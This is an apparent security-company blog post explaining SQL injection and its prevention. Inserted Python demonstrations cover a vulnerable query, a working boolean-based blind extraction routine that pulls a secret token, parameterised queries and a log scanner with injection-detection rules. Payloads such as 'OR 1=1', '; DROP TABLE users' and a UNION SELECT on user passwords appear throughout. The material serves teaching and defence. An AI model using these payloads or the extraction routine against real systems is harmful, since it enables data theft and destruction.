What Is an SQL Injection Attack and How to Prevent It
“What is an SQL injection attack and how do I stop it from happening?” This is a question asked by many organisations, and with good reason.
According to the Open Web Application Security Project (OWASP), injection, a category that includes SQL injection, was the third most serious web application security risk in the 2021 OWASP Top 10.
Across the applications OWASP analysed, it recorded around 274,000 occurrences of injection-related weaknesses, which goes to show just how resilient you and your organisation need to be when faced with this type of cyber attack.
In this post we will be providing answers to a majority of questions you might have on SQL injection attacks, which includes:
- The aforementioned, what is an SQL injection attack?
- How are SQL injection attacks performed?
- What are the three main types of SQL injection?
- And most importantly, how can you prevent it?
You’ll find all of this information below, starting with a clear explanation as to what this type of cyber attack is and involves.
Let’s get started.
What Is an SQL Injection Attack?
An SQL injection, otherwise known as SQLI, is a type of cyber attack that injects malicious SQL code into the queries an application sends to its database, giving the attacker the ability to view or modify that database without permission.
How attackers choose to modify your database will vary from case to case. Some might use it to view sensitive company data and others could look for private customer details.
A successful SQL injection can cause a lot of damage to a business, leaving them with a variety of additional problems that they then need to sort out, such as angry customers and a tarnished reputation that is not so easily repaired.
Another major problem is one we’ve already mentioned, whereby a hacker modifies a database without permission. Not having backups or access to the pre-altered data could devastate an organisation.
This is one of the reasons why it is essential to have a full plan in place should you become subject to one of these attacks, which typically involve working with an external cybersecurity team.
How An SQL Injection Attack Is Executed
In simple terms, SQL (Structured Query Language) is the language used to work with data held in a relational database management system (RDBMS).
In other words, SQL queries execute commands, including commands to retrieve data, update data and delete records. To abuse this, attackers insert malicious SQL into input that the application concatenates into a query and passes to the database server, so that their input is executed as part of the query rather than treated as data.
Like phishing and other popular cyber attacks, there are several ways to execute this form of attack, with some of the most common ways involving inputs in a web application or a web page (such as input fields that allow free text).
SQL Injection Attack Example
Let’s quickly look at an SQL injection example to show what this looks like in practice. In this hypothetical scenario an attacker manipulates a standard SQL query by exploiting an input parameter that the application never validates.
This is an HTTP request to an online store’s product page:
http://www.onlinestore.com/items/items.asp?itemid=999 or 1=1
And here’s what the corresponding SQL query for this request looks like (the itemid value has been pasted straight into the WHERE clause):
SELECT ItemName, ItemDescription FROM Items
WHERE ItemNumber = 999 OR 1=1
Since 1=1 is always true, the query will then return all of the product names and descriptions for those in the database, even those that you may not be eligible to access.
Incorrectly filtered characters, which let an attacker alter the SQL command itself, are another way for malicious attackers to cause damage to your organisation.
For example, requesting http://www.onlinestore.com/items/items.asp?itemid=999; DROP TABLE users would generate the following pair of statements, the second of which deletes the users table outright (this “stacked query” form only works where the database and driver accept more than one statement per call, but many do):
SELECT ItemName, ItemDescription FROM Items
WHERE ItemNumber = 999; DROP TABLE users
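To make the two examples above concrete, here is an added example that reproduces them against a throwaway in-memory SQLite database. It is not code from the original post and it uses Python rather than the page’s ASP scenario; the table layout, item records and the vulnerable_lookup() function are assumptions constructed for the demonstration. Python’s sqlite3 module refuses stacked statements in execute(), so the function splits on semicolons to emulate a driver that accepts them.

```python
import sqlite3


def make_catalogue():
    """Constructed sample data for the onlinestore.com scenario (not a real system)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items (ItemNumber INTEGER, ItemName TEXT, ItemDescription TEXT);
        INSERT INTO items VALUES (998, 'Kettle', 'On sale');
        INSERT INTO items VALUES (999, 'Toaster', 'On sale');
        INSERT INTO items VALUES (1000, 'Unreleased SKU', 'Staff only');
        CREATE TABLE users (id INTEGER, username TEXT);
        INSERT INTO users VALUES (1, 'admin');
    """)
    return conn


def vulnerable_lookup(conn, itemid):
    """Mirrors items.asp: the raw query-string value is pasted straight into the SQL text.

    sqlite3's execute() rejects stacked statements, so the text is split on ';' and
    each piece is run in turn to emulate a DBMS/driver that permits multiple statements.
    """
    sql = "SELECT ItemName, ItemDescription FROM items WHERE ItemNumber = " + itemid
    cur = conn.cursor()
    rows = []
    for statement in sql.split(";"):
        if statement.strip():
            cur.execute(statement)
            rows.extend(cur.fetchall())  # DROP TABLE simply yields no rows
    return rows


def table_exists(conn, name):
    """True if a table of that name still exists (checked via sqlite_master)."""
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_catalogue()
    print(vulnerable_lookup(db, "999"))             # the one row the page intends to show
    print(vulnerable_lookup(db, "999 OR 1=1"))      # every row, including the staff-only item
    vulnerable_lookup(db, "999; DROP TABLE users")  # second statement removes the users table
    print(table_exists(db, "users"))                # False
```

The first call behaves as the developer expected; the second returns the whole catalogue because the tautology widens the WHERE clause; the third silently drops a table the product page should never have been able to touch.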
3 Types of SQL Injection
Understanding the variations of an SQL injection attack is essential in understanding how much damage it can cause, but also, what to look out for.
There are three main types of SQL injection of note:
- In-band SQL Injection
- Inferential SQL Injection
- Out-of-Band SQL Injection
All three offer something unique to be aware of but will mostly lead to the same outcomes for hackers, that being:
Full infiltration of your organisation’s database.
In-Band SQL Injection
In-band SQL injections are the most common type of SQL-related attack. This involves a malicious user using the same communication channel to attack and gather results.
Error-based SQL injection and union-based SQL injection are two of the most common types of in-band SQL injection attacks, and are executed in very different ways.
The former deliberately provokes a database error, and relies on the application echoing the server’s error message back in the response. Those messages often reveal table names, column names and even query results, so the attacker learns about the database from the errors themselves.
Union-based SQL injection uses the UNION SQL operator to bolt an attacker-chosen SELECT statement onto the application’s own query. The combined result set comes back in the normal HTTP response, so the attacker can read data from tables the page was never meant to show.
Inferential SQL Injection
Inferential SQL injection, or blind SQL injection as it’s also known, is where the application returns no data or error messages from the database at all. Instead, malicious users learn about the structure and contents of the database by sending payloads and observing how the application’s behaviour changes in response.
Again, like with in-band SQL injection, there are multiple different attacks to be aware of:
- Boolean-Based Injection: An attack where a SQL condition is injected into the query and the attacker watches whether the page’s content changes. Each request answers one true/false question about the database, so the attacker can recover data one bit or one character at a time.
- Time-Based Injection: With this technique, the injected condition makes the database pause for a set number of seconds (for example with a delay function) only when the condition is true. The attacker then infers true or false from how long the response takes, which works even when the page looks identical either way.
Inferential SQL injection is a lot less common than in-band injection, but that doesn’t make it any less important to nip in the bud, and fast.
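The boolean-based technique described above, as an added example against an in-memory SQLite database (this is not code from the original post; the product page, the users table and its api_token column are constructed for the demonstration). The attacker only ever learns whether a product rendered, yet recovers a secret value character by character. The time-based variant simply swaps the visible-content check for a delay function such as MySQL’s SLEEP(), which SQLite lacks, so it is not shown.

```python
import sqlite3


def make_db():
    """Constructed sample data (not a real system): one product and one user record."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items (ItemNumber INTEGER, ItemName TEXT);
        INSERT INTO items VALUES (999, 'Toaster');
        CREATE TABLE users (id INTEGER, username TEXT, api_token TEXT);
        INSERT INTO users VALUES (1, 'admin', 'tk-7f3a');
    """)
    return conn


def vulnerable_page_shows_item(conn, itemid):
    """The injectable product page. The attacker never sees rows or errors,
    only whether a product rendered (True) or the page came back empty (False)."""
    sql = "SELECT ItemName FROM items WHERE ItemNumber = " + itemid
    return conn.execute(sql).fetchone() is not None


# Characters the attacker is prepared to guess; widen it for real-world data.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789-_"


def blind_extract(oracle, subquery, max_len=64):
    """Recover the single value returned by `subquery`, one character at a time.

    `oracle(payload)` returns the page's true/false behaviour for an itemid value.
    Returns the recovered string and the number of requests it cost.
    """
    recovered = ""
    requests = 0
    for pos in range(1, max_len + 1):
        requests += 1
        # Is there a character at this position at all? If not, we are done.
        if not oracle(f"999 AND length(({subquery})) >= {pos}"):
            break
        for ch in ALPHABET:
            requests += 1
            # True only when the guessed character matches the real one.
            if oracle(f"999 AND substr(({subquery}), {pos}, 1) = '{ch}'"):
                recovered += ch
                break
        else:
            raise ValueError(f"character {pos} is outside the search alphabet")
    return recovered, requests


if __name__ == "__main__":
    db = make_db()
    secret, cost = blind_extract(
        lambda payload: vulnerable_page_shows_item(db, payload),
        "SELECT api_token FROM users WHERE username = 'admin'",
    )
    print(secret, "recovered in", cost, "requests")
```

Every character costs up to one request per alphabet entry, which is why blind injection shows up in logs as long bursts of near-identical requests to one endpoint; that traffic pattern is itself a useful detection signal.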
Out-of-Band SQL Injection
This is the least common form of SQL injection attack. With out-of-band injections, a hacker will use a different communication channel for the attack. Think of it as the polar opposite of in-band SQL injection.
Nefarious individuals use this method when the normal channel is unusable, for example because the server’s responses are too slow or unstable to infer anything from. Instead, the injected SQL makes the database server itself reach out to an attacker-controlled host (typically via a DNS lookup or an HTTP request) carrying the stolen data, so the results arrive on a channel the application never sees.
How to Prevent SQL Injection Attacks
There are many ways to prevent SQLI attacks from taking place, including ways to protect your organisation should they occur, which is an important point to make as these attacks can and do happen.
User input channels tend to be the main vector for such attacks, which requires a controlled approach, one that vets user input to watch for attack patterns. This is just one of the ways to prevent SQL injection attacks.
Other methods can be a lot more thorough, input validation being one of the most common. This acts as a sort of digital watchdog, one that validates based on the accepted type, length, format, and so on.
In other words, only the value which passes the validation can be processed, thus stopping hackers from carrying out their actions right at the beginning.
Validation shouldn’t only be applied to fields that allow users to type in input, meaning you should also take care of the following situations in equal measure:
- Use regular expressions as allowlists (whitelists) for structured data (such as name, age, income, survey response, zip code) to ensure strong input validation: accept only what matches the expected pattern and reject everything else.
- In case of a fixed set of values (such as drop-down list, radio button), determine which value is returned. The input data should match one of the offered options exactly.
Prepared Statements (Parameterised Queries)
This prevention method pre-compiles the SQL statement with placeholders, after which the parameter values are supplied separately for execution. Because the database has already parsed the statement before it ever sees the values, it cannot confuse the developer’s code with the user’s input data.
The user input is never spliced into the SQL text, so no value, however it is crafted, can change the intent of the statement. This makes parameterised queries the single most effective mitigation for SQL injection, and they should be the default everywhere a query takes external input.
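Here is an added example that puts the allowlist validation and parameterised queries sections together, again in Python against an in-memory SQLite database (this is not code from the original post; the itemid pattern, table layout and function names are assumptions made for the demonstration). It shows the same itemid=999 OR 1=1 input from earlier being stopped twice over: once by validation, and once by parameter binding alone even when validation is skipped.

```python
import re
import sqlite3

# Allowlist for the itemid parameter: item numbers are 1 to 9 digit positive integers.
ITEMID_PATTERN = re.compile(r"[0-9]{1,9}")

# The SQL text is a constant; the '?' is a placeholder the driver binds a value to.
LOOKUP_SQL = "SELECT ItemName, ItemDescription FROM items WHERE ItemNumber = ?"


def validate_itemid(raw):
    """Allowlist validation: returns an int, or raises ValueError for anything else."""
    if not isinstance(raw, str) or not ITEMID_PATTERN.fullmatch(raw):
        raise ValueError("itemid must be 1 to 9 digits")
    return int(raw)


def make_catalogue():
    """Constructed sample data (not a real system)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items (ItemNumber INTEGER, ItemName TEXT, ItemDescription TEXT);
        INSERT INTO items VALUES (999, 'Toaster', 'On sale');
        INSERT INTO items VALUES (1000, 'Unreleased SKU', 'Staff only');
    """)
    return conn


def safe_lookup(conn, raw_itemid):
    """Validate first, then bind the value as a parameter; the SQL text never changes."""
    itemid = validate_itemid(raw_itemid)
    return conn.execute(LOOKUP_SQL, (itemid,)).fetchall()


def parameter_only_lookup(conn, raw_itemid):
    """No validation at all, but still parameterised. The driver ships the value
    separately from the already-parsed statement, so it is only ever compared as
    data: it cannot append OR 1=1 or start a second statement."""
    return conn.execute(LOOKUP_SQL, (raw_itemid,)).fetchall()


if __name__ == "__main__":
    db = make_catalogue()
    print(safe_lookup(db, "999"))                         # [('Toaster', 'On sale')]
    try:
        safe_lookup(db, "999 OR 1=1")
    except ValueError as err:
        print("rejected:", err)                            # stopped at the front door
    print(parameter_only_lookup(db, "999 OR 1=1"))         # [] - compared as one literal value
    print(parameter_only_lookup(db, "999; DROP TABLE users"))  # [] - no second statement runs
```

Validation and parameterisation are complementary: validation keeps obviously bad data out of your business logic and gives you a clean error to log, while parameterisation guarantees that whatever does reach the query cannot change its structure.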
Stored Procedures
Stored procedures (SP) let the developer group one or more SQL statements into a logical unit that lives in the database and is called with arguments. When the procedure’s statements use those arguments as parameters, every call is parameterised automatically, which gives the same protection as a prepared statement.
Simply put, it’s a type of code that can be stored and used many times, meaning you simply execute the procedure each time rather than writing the query over and over again. One caveat: a stored procedure that builds SQL text dynamically from its arguments inside the database is just as injectable as application code doing the same thing, so check the procedure bodies, not only the call sites.
Character Escaping
Character-escaping functions should be used, where parameterisation is genuinely unavailable, to ensure that the database management system (DBMS) never confuses the SQL statement written by the developer with the input supplied by the user, which is exactly the confusion an injection relies on.
This can be a tough one to understand, so let’s use an example. Let’s say you use mysqli_real_escape_string() in PHP to neutralise characters, such as the single quote, that could otherwise end a string literal and start an unintended SQL command.
A login query hardened with that function would look like this:
// Escape each value for the connection's character set before it touches the SQL text
$db_connection = mysqli_connect("localhost", "user", "password", "db");
$username = mysqli_real_escape_string($db_connection, $_POST['username']);
$password = mysqli_real_escape_string($db_connection, $_POST['password']);
$query = "SELECT * FROM users WHERE username = '" . $username . "' AND password = '" . $password . "'";
Without those two escaping calls, a single quote typed into the username field would terminate the string literal and the rest of the input would be parsed as SQL. The escaping function places a backslash in front of such characters so that they stay inside the literal, which is what prevents a successful SQLI here. Two caveats: escaping only protects values inside quoted string literals (the unquoted itemid parameter in the earlier example would still accept 999 OR 1=1), and it is easy to forget on one code path. Treat it as a last resort and prefer prepared statements.
Web Application Firewall
Easily one of the most practical ways to identify and block SQL injection attempts at the edge is by setting up something known as a web application firewall (WAF).
This firewall acts as a shield in front of your web traffic, inspecting requests on the way in and responses on the way out and flagging or blocking those that match known attack patterns. It’s a defence-in-depth tool rather than a substitute for fixing the code, since determined attackers work on evading signatures, but it buys time and visibility, and it isn’t limited to just SQL injection attacks either.
WAFs are very efficient at protecting your organisation from a number of threats:
- Session Hijacking
- Cookie Poisoning
- Parameter Tampering
- Cross-Site Scripting (XSS)
- DDoS Attacks
We have a blog dedicated to distributed denial of service (DDoS) attacks, for those interested in finding out more.
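As an added example of the kind of pattern matching a WAF or log monitor performs (this is not code from the original post or from any particular WAF product), the following Python scans a handful of constructed web-server access-log lines for the three injection shapes discussed on this page: the OR 1=1 tautology, a stacked DROP/DELETE statement, and a UNION SELECT. The log format, IP addresses and rules are assumptions made for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). Query strings are
# URL-encoded exactly as a browser or attack tool would send them.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2023:10:01:02 +0000] "GET /items/items.asp?itemid=999 HTTP/1.1" 200 512
203.0.113.9 - - [10/Mar/2023:10:01:07 +0000] "GET /items/items.asp?itemid=999%20or%201%3D1 HTTP/1.1" 200 40960
203.0.113.9 - - [10/Mar/2023:10:01:09 +0000] "GET /items/items.asp?itemid=999%3B%20DROP%20TABLE%20users HTTP/1.1" 500 120
198.51.100.2 - - [10/Mar/2023:10:02:11 +0000] "GET /items/items.asp?itemid=1000 HTTP/1.1" 200 498
203.0.113.9 - - [10/Mar/2023:10:03:30 +0000] "GET /items/items.asp?itemid=999%27%20UNION%20SELECT%20username%2Cpassword%20FROM%20users-- HTTP/1.1" 200 2048
"""

# Detection rules, applied to the *decoded* request path. Each names one attack shape.
RULES = {
    "tautology": re.compile(r"\bor\b\s+\S+\s*=\s*\S+", re.I),
    "stacked_query": re.compile(r";\s*(drop|delete|insert|update|alter)\b", re.I),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I),
}

# Common log format: client IP, ident, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]+" (?P<status>\d{3})'
)


def scan_log(text):
    """Return (client_ip, rule_name, decoded_path) for every request that trips a rule."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # malformed or unrelated line; a real monitor would count these
        # Decode before matching: %20, %3B and '+' would otherwise hide the payload.
        decoded = unquote_plus(match.group("path"))
        for name, rule in RULES.items():
            if rule.search(decoded):
                findings.append((match.group("ip"), name, decoded))
    return findings


if __name__ == "__main__":
    for ip, rule, path in scan_log(SAMPLE_LOG):
        print(f"{ip}  {rule:14}  {path}")
```

Note what the rules do not do: they will miss payloads that use SQL comments, inline whitespace tricks, double encoding or alternative keywords, and a keyword-only rule can false-positive on legitimate text. That is why the WAF sits in front of parameterised queries rather than replacing them; its real value is early warning and blocking the noisy, automated bulk of attempts.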
TLR’s Approach to SQL Injection Attacks
Do keep in mind that there is only so much you can do alone to prevent SQL injection attacks, which is why many organisations turn to TLR Global to double down on their prevention efforts.
We offer a range of cybersecurity services, all geared towards keeping your organisation up and running and free from malicious activity.
For SQLI, we’d highly recommend our digital risk protection services that continuously monitor for threats, indicators of risk, and even provide remediation recommendations should you need them.
This isn’t a blanket approach either, meaning we tailor these services around your organisation to strengthen the areas that matter.
Are you uncomfortable with handling your cybersecurity or simply don’t have the resources? We also offer managed security services whereby we work with you directly to manage your online security, either remotely or onsite.
We become the cybersecurity extension of your organisation, essentially. This is a very helpful option should you decide to run with Cavalry or our SETH solutions.
What Is an SQL Injection Attack and How to Prevent It?
“What is an SQL injection attack and how do I stop it from happening?” Hopefully we’ve given you the answers you were looking for to this question, and many others relating to SQLI.
To recap, we’ve defined what an SQL injection attack is, we’ve looked at how this type of cyber attack is executed, we’ve identified the three main types of SQL injection, and we then looked at various prevention methods.
We also covered the TLR approach to this very common issue.
Do get in touch if you’d like to find out more about our approach to SQLI, or about any other cyber-related issue you are facing or want safeguarding from.
As mentioned, we have a range of cyber solutions available that all work to shield your organisation’s future. In the meantime, why not check out some of our other blog posts on the site?
We have posts dedicated to preventing data breaches, phishing, rootkits, exfiltration, and many more.